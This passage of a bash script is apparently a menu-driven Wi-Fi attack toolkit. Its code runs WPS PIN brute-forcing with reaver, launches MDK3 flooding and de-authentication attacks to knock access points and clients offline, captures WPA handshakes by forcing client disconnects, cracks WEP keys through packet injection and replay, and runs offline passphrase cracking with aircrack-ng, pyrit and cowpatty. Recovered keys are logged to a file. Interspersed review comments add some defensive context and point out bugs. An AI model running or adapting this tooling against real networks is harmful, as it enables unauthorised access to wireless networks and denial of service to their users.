  682.    reaver -i mon0 -c $AP_channel -b $AP_bssid -p $PIN4REAVER -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  683.    rm reaver.txt
  684.    echo ""
  685.    fi ;;
  686.  
  687. 2)
  688. clear
  689. echo $RED"Current Reaver Attack Command:"$STAND
  690. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions"
  691. echo ""
  692. read -p $GREEN"Please input any additional reaver options (eg: -vv):$STAND " ReaverOptions
  693. echo ""
  694. echo $RED"New Reaver Attack Command:"$STAND
  695. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions"
  696. echo ""
  697. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  698. reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  699. rm reaver.txt
  700.  
  701. ################## START OF: MDK3 ACCESS POINT RESET ############################################
  702.  
  703. echo ""
  704. echo ""
  705. echo $GREEN"Would you like to try to reset the access point? Y/n"$STAND
  706. read a
  707. if [[ $a == "Y" || $a == "y" || $a = "" ]]; then
  708.  
  709.    echo "Press the [Enter] button 3 times on the kismet screen, wait 5-10 seconds then press Ctrl+c."
  710.    kismet ncsource=mon0:hop=true
  711.    sleep 5
  712.  
  713.    echo ""
  714.    echo $RED"Target essid:$STAND $AP_essid"
  715.    echo ""
  716.    read -p $GREEN"Please input the above target essid.$STAND" MDK3_Target
  717.    echo ""
  718.    cat $HOME/scrypta/temp/*.nettxt | sed -n "/$MDK3_Target/,/Channel/p"
  719.  
  720.    echo 'AP_bssid="'"$AP_bssid"'"' > MDK3_APbssid.txt
  721.    sleep 1
  722.    echo 'AP_channel="'"$AP_channel"'"' > MDK3_APchannel.txt
  723.    sleep 1
  724.    cat MDK3_APbssid.txt | sed 's/AP_bssid=//' | sed 's/"//g' > MDK3_APbssid_1.txt
  725.    sleep 1
  726.    cat MDK3_APchannel.txt | sed 's/AP_channel=//' | sed 's/"//g' > MDK3_APchannel_1.txt
  727.    sleep 1
  728.    echo $AP_bssid > Blacklist.txt
  729.  
  730.    echo ""
  731.    echo $GREEN"Does the access point support WAP+TKIP?"
  732.    echo $GREEN"[1]$BLUE = Yes."
  733.    echo $GREEN"[2]$BLUE = No."
  734.    echo $GREEN"1 or 2?"$STAND
  735.    read option
  736.  
  737.    if [[ $option == "1" ]]; then
  738.  
  739.       read -s -n1 -p $GREEN"Would you like to scan for clients connected to the target access point? Y/n:$STAND  " ClientScan
  740.  
  741.       if [[ $ClientScan == "Y" || $ClientScan == "y" ]]; then
  742.          xterm -geometry 111x24+650+0 -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
  743.          echo ""
  744.          echo ""
  745.       fi
  746.  
  747.       echo $GREEN"Did the access point have any clients connected to it?"
  748.       echo $GREEN"[1]$BLUE = Yes."
  749.       echo $GREEN"[2]$BLUE = No."
  750.       echo $GREEN"1 or 2?"$STAND
  751.       read MDK3_ClientChoice
  752.  
  753.       if [[ $MDK3_ClientChoice == "1" ]]; then
  754.  
  755.          echo '#!/bin/bash
  756.  
  757. RED=$(tput setaf 1 && tput bold)
  758. GREEN=$(tput setaf 2 && tput bold)
  759. STAND=$(tput sgr0)
  760.  
  761. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
  762. sleep 1
  763. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
  764. echo ""
  765. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
  766.  
  767.    xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
  768.    xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
  769.    xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
  770.    xterm -geometry 100x10+675+345 -e "mdk3 mon0 m -t $AP_bssid -j" &
  771.  
  772. while :
  773. do
  774.    xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
  775.    sleep 20
  776.    kill `pidof airodump-ng`
  777. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
  778.  
  779.       fi
  780.  
  781.       if [[ $MDK3_ClientChoice == "2" ]]; then
  782.  
  783.          echo '#!/bin/bash
  784.  
  785. RED=$(tput setaf 1 && tput bold)
  786. GREEN=$(tput setaf 2 && tput bold)
  787. STAND=$(tput sgr0)
  788.  
  789. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
  790. sleep 1
  791. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
  792. echo ""
  793. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
  794.  
  795.    xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
  796.    xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
  797.    xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
  798.    xterm -geometry 100x10+675+345 -e "mdk3 mon0 m -t $AP_bssid" &
  799.  
  800. while :
  801. do
  802.    xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
  803.    sleep 20
  804.    kill `pidof airodump-ng`
  805. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
  806.  
  807.       fi
  808.       fi
  809.  
  810.    if [[ $option == "2" ]]; then
  811.  
  812.    echo '#!/bin/bash
  813.  
  814. RED=$(tput setaf 1 && tput bold)
  815. GREEN=$(tput setaf 2 && tput bold)
  816. STAND=$(tput sgr0)
  817.  
  818. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
  819. sleep 1
  820. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
  821. echo ""
  822. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
  823.  
  824.    xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
  825.    xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
  826.    xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
  827.  
  828. while :
  829. do
  830.    xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
  831.    sleep 20
  832.    kill `pidof airodump-ng`
  833. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
  834.  
  835.    fi
  836.  
  837.    sleep 1
  838.    chmod +x $HOME/scrypta/temp/MDK3_AP_Reset.sh
  839.    sleep 1
  840.    Eterm -g 100x10-640-500 --cmod "red" -T "Main Window - Press Ctrl+c to exit MDK3" -e sh -c "$HOME/scrypta/temp/MDK3_AP_Reset.sh; bash"
  841.    rm $HOME/scrypta/temp/Blacklist.txt
  842.  
  843. if [[ $a == "N" || $a == "n" ]]; then
  844.    echo ""
  845. fi
  846. fi
  847. ################## END OF: MDK3 ACCESS POINT RESET ############################################
  848.  
  849. echo "" ;;
  850. 0) exit 0;;
  851. *) echo "";
  852. echo "Press [Enter] to continue. . ." ; read ;;
  853. esac
  854.  
  855. ############## End Of Reaver Attacks And Store Recovered Passkey ##############
  856.  
  857. ######################## LOOP ############################################
  858.  
  859. clear
  860. read -s -n1 -p $RED"Choose another target or return to the main menu:$GREEN
  861. y $BLUE= Choose another target.$GREEN
  862. n $BLUE= Return to main menu.$GREEN
  863. Please choose y/n?$STAND: " CONFIRM
  864. case $CONFIRM in
  865. n|N|NO|no|No)
  866. break ;;
  867. *) echo "" ;;
  868. esac
  869. done
  870.  
  871. ############## End Of Loop Section ##############
  872.  
  873. ############## Start Of Cleanup ##############
  874.  
  875. rm *.txt
  876. rm *.py
  877. cd
  878. ############## End Of Cleanup ##############
  879. ;;
  880.  
  881. ###### [4] Capture WPA/WPA2 Handshake ######
  882. 4)
       # Menu option 4: interactive WPA/WPA2 handshake capture for one access point.
       # Flow: scan for WPA networks, let the operator pick an AP and then a client,
       # record that AP's traffic to psk-* files, optionally send de-authentication
       # frames, and finally move the capture into Captured_Handshakes.
       # The interface name mon0 and the working directory $HOME/scrypta/temp are fixed.
       # Defensive context: de-authentication frames are only rejected by networks that
       # enforce 802.11w Protected Management Frames, and a recorded handshake permits
       # offline guessing only, so passphrase strength is the remaining control.
       # NOTE(review): the cd below is unchecked; if it fails, every relative rm/mv glob
       # later in this arm acts on whatever directory the script was started from.
  883. cd $HOME/scrypta/temp
  884. clear
  885. echo $RED"Scan for possible targets."
  886. echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."
  887. read -p $GREEN"Press [Enter] to start the scan.$STAND"
  888.  
       # xterm -l -lf logs the scanner's screen output to WPA_Scan.txt for parsing below.
  889. xterm -geometry 111x35+650+0 -l -lf WPA_Scan.txt -e airodump-ng --encrypt WPA mon0
  890.  
       # Keep only the last screen refresh in the log (final 'CIPHER' header up to the
       # 'STATION' section), keep rows containing PSK, and drop '<length:  0>' rows
       # (presumably hidden ESSIDs). The second pipeline strips a fixed-width prefix and
       # numbers the remaining rows for the selection menu.
       # NOTE(review): the fixed-width strip and the awk field numbers used further down
       # assume one particular column layout and an ESSID without spaces — confirm.
  891. tac WPA_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | grep "PSK" | sed -r -e 's/\./ /' | sed '/<length:  0>/d' > temp0.txt
  892. cat temp0.txt | sed 's/^..........................................................................//' | nl -ba -w 1  -s ':  ' | awk '{ print $1, $2 }' | sed 's/^1:/ 1:/' | sed 's/^2:/ 2:/' | sed 's/^3:/ 3:/' | sed 's/^4:/ 4:/' | sed 's/^5:/ 5:/' | sed 's/^6:/ 6:/' | sed 's/^7:/ 7:/' | sed 's/^8:/ 8:/' | sed 's/^9:/ 9:/' > PresentedAPs.txt
  893. sleep 1
  894.  
  895. PresentedAPs=$(cat PresentedAPs.txt)
  896. sleep 1
  897. echo ""
  898. echo "Please choose an AP"
  899. echo ""
  900. echo "$PresentedAPs"
  901. echo ""
  902. read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_AP
  903. echo ""
  904.  
       # Select the chosen row by line number and split it into ESSID, BSSID and channel.
       # NOTE(review): Chosen_AP is spliced into the sed program without checking that it
       # is a number, so any other input is interpreted as sed syntax.
  905. Chosen_AP_Details=$(cat temp0.txt | sed -n ""$Chosen_AP"p")
  906. AP_essid=`echo "$Chosen_AP_Details" | awk '{ print $11 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  907. AP_bssid=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  908. AP_channel=`echo "$Chosen_AP_Details" | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  909.  
  910. clear
  911. echo $RED"Chosen Target Details."$STAND
  912. echo $RED"Aceess Point essid$STAND: $AP_essid"
  913. echo $RED"Aceess Point bssid$STAND: $AP_bssid"
  914. echo $RED"Aceess Point Channel Number$STAND: $AP_channel"
  915.  
  916. echo ""
  917. echo $RED"Scan for clients connected to$STAND $AP_essid"
  918. echo $RED"Once you have identified the client you wish to target press Ctrl-C to exit"$STAND
  919. read -p $GREEN"Press [Enter] to start the scan."$STAND
  920.  
       # Second logged scan, limited to the chosen channel and BSSID, to list its clients.
  921. xterm -geometry 100x20+650+0 -l -lf WPA_ClientScan.txt -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
  922.  
       # Loop: pick a client, start a capture, act on the operator's choice, and repeat
       # until the operator answers n/N/NO/no/No at the final prompt.
  923. while true
  924. do
  925.  
       # Rebuild the numbered client list from the last screen refresh of the client scan.
  926. tac WPA_ClientScan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -r -e 's/\./ /' | sed '$d' | sed '1,6d' | awk '{ print $2 }' > temp1.txt
  927. cat temp1.txt | nl -ba -w 1  -s ': ' > ConnectedClientsScan.txt
  928. ConnectedClientsScan=$(cat ConnectedClientsScan.txt)
  929.  
  930. sleep 2
  931. echo ""
  932. echo $RED"Please choose a client MAC address"$STAND
  933. echo ""
  934. echo "$ConnectedClientsScan"
  935. echo ""
  936. read -p $GREEN"Please input the number of your chosen client MAC address:$STAND " Chosen_Client
  937. echo ""
  938.  
  939. sleep 1
  940. Chosen_Client_MAC=$(cat temp1.txt | sed -n ""$Chosen_Client"p")
  941. echo ""
  942. echo $RED"Chosen Client MAC Address."$STAND
  943. echo "$Chosen_Client_MAC"
  944. echo ""
  945.  
       # Background capture writing psk-* files; it is started again on every pass of
       # the loop and only stopped by the pidof-based kill after the loop.
       # NOTE(review): values parsed from scan output are interpolated unquoted into the
       # command string that xterm -e runs; scan output is data supplied by whatever is
       # in radio range and should be treated as untrusted input.
  946. xterm -geometry 100x20+675+0 -e "airodump-ng -c $AP_channel --ignore-negative-one -w psk --bssid $AP_bssid mon0" &
  947.  
  948. echo $RED"Choose an option:"
  949. echo $GREEN"[1]$BLUE = De-Authenticate The Chosen Client?."
  950. echo $GREEN"[2]$BLUE = De-Authenticate All Connected Clients?."
  951. echo $GREEN"[3]$BLUE = Choose another client."
  952. echo $GREEN"1, 2, or 3?"$STAND
  953. read option
  954.  
       # Options 1 and 2 run aireplay-ng -0 10 in a foreground xterm, with and without a
       # client address; option 3 only re-prompts for a client and sends nothing.
  955. if [[ $option == "1" ]]; then
  956.        echo "De-Authenticate a single client."
  957.        xterm -geometry 100x20+675+350 -e  "aireplay-ng -0 10 --ignore-negative-one -a $AP_bssid -c $Chosen_Client_MAC mon0"
  958.        fi
  959. if [[ $option == "2" ]]; then
  960.        echo "De-Authenticate all connected clients."
  961.        xterm -geometry 100x20+675+350 -e  "aireplay-ng -0 10 --ignore-negative-one -a $AP_bssid mon0"
  962.        fi
  963. if [[ $option == "3" ]]; then
  964.        clear
  965. echo "Please choose a client"
  966.        echo ""
  967.        echo "$ConnectedClientsScan"
  968.        echo ""
  969.        read -p $GREEN"Please input the number of the chosen client:$STAND " Chosen_Client
  970.        echo ""
  971.        Chosen_Client_MAC=$(cat temp1.txt | sed -n ""$Chosen_Client"p")
  972.        echo ""
  973.        echo "Chosen Target Details."
  974.        echo "$Chosen_Client_MAC"
  975.        sleep 4
  976.        fi
  977.  
  978. clear
  979. echo -n $GREEN"Re-send de-auth request or choose another client? (y or n)$STAND: "
  980. read -e CONFIRM
  981. case $CONFIRM in
  982. n|N|NO|no|No)
  983. break ;;
  984. *) echo "" ;;
  985. esac
  986. done
  987.  
       # Cleanup of the scan artefacts created above (all relative to the current directory).
  988. rm WPA_Scan.txt
  989. rm temp0.txt
  990. rm PresentedAPs.txt
  991.  
  992. rm WPA_ClientScan.txt
  993. rm temp1.txt
  994. rm ConnectedClientsScan.txt
  995.  
       # NOTE(review): pidof matches every airodump-ng process on the host, not only the
       # ones this arm started.
  996. kill `pidof airodump-ng`
  997. rm *.csv
  998. rm *.netxml
       # NOTE(review): $AP_essid is used unquoted as a file name. The ESSID is chosen by
       # the remote access point, so a '/' or whitespace in it changes where the file is
       # written. With more than one *.cap present, mv also needs a directory as its last
       # argument and fails.
  999. mv *.cap $HOME/scrypta/Captured_Handshakes/$AP_essid.cap
  1000. cd
  1001. ;;
  1002.  
  1003. ###### [5] WEP Attacks ######
  1004. 5)
        # Menu option 5: interactive WEP key recovery for one access point.
        # Flow: logged scan for WEP networks, operator picks an AP, logged client scan,
        # then one of two branches depending on whether the AP had clients. Both branches
        # append the result to $HOME/scrypta/Recovered-WPA-Passkeys.txt.
        # Defensive context: WEP keys are recoverable from captured traffic whatever the
        # key's strength, so the mitigation is to retire WEP rather than to rotate keys.
        # NOTE(review): the cd below is unchecked; the relative globs later in this arm
        # (*.cap, *.ivs, *.xor) depend on it having succeeded.
  1005. cd $HOME/scrypta/temp
  1006. clear
  1007. echo $RED"Scan for possible targets."$STAND
  1008. echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."$STAND
  1009. read -p $GREEN"Press [Enter] to start the scan.$STAND"
  1010.  
  1011. xterm -geometry 111x35+650+0 -l -lf WEP_Scan.txt -e airodump-ng --encrypt WEP mon0
  1012.  
  1013. sleep 1
        # Keep the last screen refresh of the logged scan (final 'CIPHER' header up to
        # 'STATION'), drop two leading lines, the last line and '<length:  0>' rows.
  1014. tac WEP_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | sed '1,2d' | sed '$d' | sed '/<length:  0>/d' > temp0.txt
  1015. sleep 1
        # Field 10 is used as the ESSID here and below.
        # NOTE(review): the field numbers assume a fixed column layout and an ESSID
        # without spaces — confirm against the tool's output.
  1016. PresentedAPs=$(cat temp0.txt | awk '{ print $10 }' | nl -ba -w 1  -s ':  ' | sed 's/^[ \t]*//;s/[ \t]*$//' )
  1017.  
  1018. clear
  1019. echo $RED"Please choose a target"$STAND
  1020. echo ""
  1021. echo "$PresentedAPs"
  1022. echo ""
  1023. read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_AP
  1024. echo ""
  1025.  
        # NOTE(review): Chosen_AP is spliced into the sed program without being checked
        # for being a number.
  1026. Chosen_AP_Details=$(cat temp0.txt | sed -n ""$Chosen_AP"p")
  1027. AP_essid=`echo "$Chosen_AP_Details" | awk '{ print $10 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  1028. AP_bssid=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  1029. AP_channel=`echo "$Chosen_AP_Details" | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  1030.  
  1031. clear
  1032. echo $RED"Chosen Target Details."$STAND
  1033. echo $RED"Aceess Point essid$STAND: $AP_essid"
  1034. echo $RED"Aceess Point bssid$STAND: $AP_bssid"
  1035. echo $RED"Aceess Point Channel Number$STAND: $AP_channel"
  1036. echo ""
  1037. echo $RED"Scan for clients connected to$STAND $AP_essid."
  1038. echo $RED"When you've identified a target press Ctrl-C to exit.$STAND"
  1039. read -p $GREEN"Press [Enter] to start the scan."$STAND
  1040.  
  1041. sleep 1
  1042. xterm -geometry 111x35+650+0 -l -lf WEP_ClientScan.txt -e airodump-ng -c $AP_channel --bssid $AP_bssid mon0
  1043.  
  1044. echo ""
  1045. echo $GREEN"Did the access point have any clients connected to it?. (y/n)$STAND"
  1046. read answer
  1047.  
        # Branch A (answer y/Y): the AP had clients; the operator picks one from the log.
  1048. if [[ $answer == "y" || $answer == "Y" ]]; then
  1049.  
  1050.        tac WEP_ClientScan.txt | grep 'STATION' -m 1 -B 9999 | tac | awk '{ print $2 }' | sed '1,2d' | sed '$d' > ClientScan.txt
  1051.        sleep 2
  1052.        PresentedClients=$(cat ClientScan.txt | awk '{ print $1 }' | nl -ba -w 1  -s ':  ' | sed 's/^[ \t]*//;s/[ \t]*$//')
  1053.        
  1054.        sleep 2
  1055.        clear
  1056.        echo "Please choose a client"
  1057.        echo ""
  1058.        echo "$PresentedClients"
  1059.        echo ""
  1060.        
  1061.        read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_Client
  1062.        echo ""
  1063.  
        # NOTE(review): Chosen_ClientMAC is assigned here but not read again in this arm;
        # ClientMAC is taken from field 1 of Chosen_AP_Details, the same expression that
        # produced AP_bssid above.
  1064.        Chosen_ClientMAC=$(cat ClientScan.txt | sed -n ""$Chosen_Client"p")
  1065.        ClientMAC=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
  1066.  
  1067.        echo $RED"You've chosen:"
  1068.        echo $RED"Client$STAND: $ClientMAC"
  1069.        echo ""
  1070.        
        # Repeat until the operator confirms success with y/Y/YES/yes/Yes.
  1071.        while true
  1072.        do
  1073.  
  1074.        read -p $GREEN"Press [Enter] to start the attack.$STAND"
        # Three background xterms: one capture writing capture-* files and two aireplay-ng
        # jobs. NOTE(review): $AP_essid comes from scan output and is interpolated unquoted
        # into a string that xterm -e passes to a shell; treat it as untrusted input.
  1075.        xterm -e "airodump-ng -w capture --bssid $AP_bssid -c $AP_channel mon0" &
  1076.        xterm -e "sleep 1 && aireplay-ng -1 0 -e $AP_essid -a $AP_bssid -h $ClientMAC --ignore-negative-one mon0" &
  1077.        xterm -e "sleep 1 && aireplay-ng -3 -b $AP_bssid -h $ClientMAC --ignore-negative-one mon0" &
  1078.        echo $RED"NOTE: There's a 60 second delay before Aircrack-ng starts the cracking process."
  1079.        echo "Please wait for aircrack to start...$STAND"
  1080.        sleep 60
        # aircrack-ng is asked to write the key to WEPpasskey.txt (-l), which is read back
        # on the next lines.
  1081.        aircrack-ng -b $AP_bssid *.cap -l WEPpasskey.txt
  1082.        sleep 2
  1083.        passkey=$(cat WEPpasskey.txt)
  1084.        sleep 2
        # NOTE(review): pidof xterm matches every xterm the user has open, including
        # unrelated ones.
  1085.        kill `pidof xterm`
  1086.        echo ""
  1087.        echo $RED"Target essid$STAND: $AP_essid"
  1088.        echo $RED"Target bssid$STAND: $AP_bssid"
  1089.        echo $RED"Target Pass-Key$STAND: $passkey"
  1090.  
  1091.        echo -n $GREEN"Was the attack successful? (y or n)$STAND: "
  1092.        read -e CONFIRM
  1093.        case $CONFIRM in
  1094.        y|Y|YES|yes|Yes)
  1095.        break ;;
  1096.        *) echo $RED"Please re-enter information$STAND" ;;
  1097.        esac
  1098.        done
  1099.  
        # The result is appended in clear text; no chmod or umask change is visible here,
        # so the file gets the process's default permissions.
        # NOTE(review): this branch removes none of the files it created (WEPpasskey.txt,
        # capture-*, ClientScan.txt), unlike branch B below.
  1100.        echo AP ESSID: $AP_essid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  1101.        echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  1102.        echo WEP Passkey: $passkey >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  1103.        echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  1104.        cd
  1105.        fi
        # Branch B (answer n/N): no clients were seen; the steps below use $mon0mac, which
        # is set outside this arm.
  1106. if [[ $answer == "n" || $answer == "N" ]]; then
  1107.        while true
  1108.        do
  1109.  
  1110.        echo $RED"Starting packet capture, press Ctrl+c to end it"$STAND
        # PIDs of the two background xterms are kept so that they can be killed later.
  1111.        xterm -geometry 100x20+675+0 -e "airodump-ng -c $AP_channel --bssid $AP_bssid --ivs -w capture mon0" & AIRODUMPPID=$!
  1112.        sleep 2
  1113.        aireplay-ng -1 0 -a $AP_bssid -h $mon0mac --ignore-negative-one mon0
  1114.        sleep 2
  1115.        aireplay-ng -5 -b $AP_bssid -h $mon0mac --ignore-negative-one mon0
  1116.        sleep 2
  1117.        packetforge-ng -0 -a $AP_bssid -h $mon0mac -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-packet mon0
  1118.        sleep 2
  1119.        xterm -geometry 100x20+675+100 -e "aireplay-ng -2 -r arp-packet --ignore-negative-one mon0" & AIREPLAYPID=$!
  1120.        sleep 2
  1121.  
  1122.        echo ""
  1123.        echo $GREEN"Attempt to crack the passkey if the data increases, Is the data increasing?. (y/n)$STAND"
  1124.        read option
  1125.        
        # NOTE(review): only a lowercase "y" is accepted here, while the other prompts in
        # this arm also accept "Y". For any other answer the two background xterms started
        # above are not killed before the loop repeats.
  1126.        if [[ $option == "y" ]]; then
  1127.               aircrack-ng -n 128 -b $AP_bssid *.ivs -l WEPpasskey.txt
  1128.               passkey=$(cat WEPpasskey.txt)
  1129.               rm WEPpasskey.txt
  1130.               kill ${AIRODUMPPID}
  1131.               kill ${AIREPLAYPID}
  1132.               rm *.ivs
  1133.               rm *.cap
  1134.               rm *.xor
  1135.               rm arp-packet
  1136.               echo AP ESSID: $AP_essid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  1137.               echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  1138.               echo WEP Passkey: $passkey >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  1139.               echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
  1140.               fi
  1141.  
  1142.        echo -n $GREEN"Was the attack successful? (y or n)$STAND: "
  1143.        read -e CONFIRM
  1144.        case $CONFIRM in
  1145.        y|Y|YES|yes|Yes)
  1146.        break ;;
  1147.        *) echo ""
  1148.        esac
  1149.        done
  1150.        fi
  1151.        cd
  1152. ;;
  1153.  
  1154. ###### [6] Attack Handshake.cap Files ######
  1155. 6)
        # Menu option 6: offline passphrase guessing against a saved handshake capture.
        # A sub-menu picks one of six tool combinations; options 1-3 read candidates from
        # a wordlist file, options 4-6 generate them with crunch. Each branch collects its
        # inputs, echoes them and the exact command line, waits for Enter, then runs it.
        # Nothing in this arm touches the radio; it works on files the operator names.
        # Defensive context: this kind of guessing is bounded only by passphrase entropy,
        # so a long random passphrase (or WPA3-SAE, which is designed to resist offline
        # dictionary attacks) is the control that matters.
        # NOTE(review): every operator-typed value is expanded unquoted in the command
        # lines below, so a path containing spaces or glob characters is split or expanded.
  1156. clear
  1157. echo $RED"###################################"
  1158. echo "#                                 #"
  1159. echo "#         With a wordlist         #"
  1160. echo "# $GREEN[1]$BLUE = Aircrack-ng               $RED#"
  1161. echo "# $GREEN[2]$BLUE = Pyrit                     $RED#"
  1162. echo "# $GREEN[3]$BLUE = Pyrit + Cowpatty          $RED#"
  1163. echo "#                                 #"
  1164. echo "#       Without a wordlist        #"
  1165. echo "# $GREEN[4]$BLUE = Crunch + Aircrack-ng      $RED#"
  1166. echo "# $GREEN[5]$BLUE = Crunch + Pyrit            $RED#"
  1167. echo "# $GREEN[6]$BLUE = Crunch + Pyrit + Cowpatty $RED#"
  1168. echo "#                                 #"
  1169. echo "###################################"
  1170. echo
  1171. echo $GREEN"Choose an option?"$STAND
  1172. read option
        # Option 1: aircrack-ng with a wordlist file and a capture file.
  1173. if [[ $option == "1" ]]; then
  1174.    clear
  1175.    echo $RED
  1176.    echo "############################################"
  1177.    echo "#                                          #"
  1178.    echo "#$STAND   Attack Capture File Using A Wordlist   $RED#"
  1179.    echo "#$STAND              (Aircrack-ng)               $RED#"
  1180.    echo "#                                          #"
  1181.    echo "############################################"
  1182.    echo
  1183.    echo $RED"eg: /root/Desktop/sky12345.cap"
  1184.    read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  1185.    echo
  1186.    echo $RED"eg: /root/Desktop/wordlist.txt"
  1187.    read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
  1188.    clear
  1189.    # Chosen user input options
  1190.    ############################
  1191.    echo
  1192.    echo $RED"You've chosen:"
  1193.    echo "=============="
  1194.    echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  1195.    echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
  1196.    echo
  1197.    echo $RED"Commands to launch:"
  1198.    echo "==================="
  1199.    echo $STAND"aircrack-ng -w $WordlistNameLocation $CapNameLocation"
  1200.    echo
  1201.    # Launch chosen commands/options
  1202.    #################################
  1203.    read -p $GREEN"Press enter to start"$STAND
  1204.    clear
  1205.    aircrack-ng -w $WordlistNameLocation $CapNameLocation
  1206.    fi
        # Option 2: pyrit attack_passthrough with a BSSID, a capture file and a wordlist.
  1207. if [[ $option == "2" ]]; then
  1208.    clear
  1209.    echo $RED
  1210.    echo "############################################"
  1211.    echo "#                                          #"
  1212.    echo "#$STAND   Attack Capture File Using A Wordlist   $RED#"
  1213.    echo "#$STAND                 (Pyrit)                  $RED#"
  1214.    echo "#                                          #"
  1215.    echo "############################################"
  1216. echo
  1217. echo $RED"eg: 00:11:22:33:44:55"
  1218. read -p $GREEN"Access Point bssid$STAND: " bssid
  1219. echo
  1220. echo $RED"eg: /root/Desktop/sky12345.cap"
  1221. read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
  1222. echo
  1223. echo $RED"eg: /root/Desktop/wordlist.txt"
  1224. read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
  1225. clear
  1226. # Chosen user input options
  1227. ############################
  1228. echo
  1229. echo $RED"You've chosen:"
  1230. echo "=============="
  1231. echo $RED"Access Point bssid$STAND: $bssid"
  1232. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
  1233. echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
  1234. echo
  1235. echo $RED"Commands to launch:"
  1236. echo "==================="
